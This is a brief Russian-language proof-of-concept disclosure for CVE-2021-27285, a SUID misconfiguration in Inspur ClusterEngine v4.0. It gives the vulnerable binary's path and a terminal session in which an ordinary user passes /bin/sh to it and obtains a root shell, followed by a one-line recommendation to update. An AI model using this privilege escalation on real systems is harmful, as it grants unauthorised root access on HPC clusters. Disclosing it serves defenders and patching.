
Эксплойт с доказательством концепции для неправильной конфигурации SUID в Inspur ClusterEngine (CVE-2021-27285), позволяющий неадминистративным пользователям повышать привилегии до root через компонент getJobsByShell.
Платформа управления кластерами Inspur ClusterEngine — это программное обеспечение для управления заданиями, специально разработанное для HPC-продуктов серии Inspur TianSuo. Неправильная настройка SUID в Inspur ClusterEngine позволяет неадминистративным пользователям повышать привилегии и получать root-доступ через некоторые компоненты.
В Inspur ClusterEngine v4.0 имеется проблема неправильной настройки SUID с компонентом "/opt/tsce4/torque6/bin/getJobsByShell", что позволяет неадминистративным пользователям повышать привилегии и получать root-доступ через механизм SUID.
Процесс повышения привилегий выглядит следующим образом:
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#
Рекомендация: обновите соответствующие компоненты.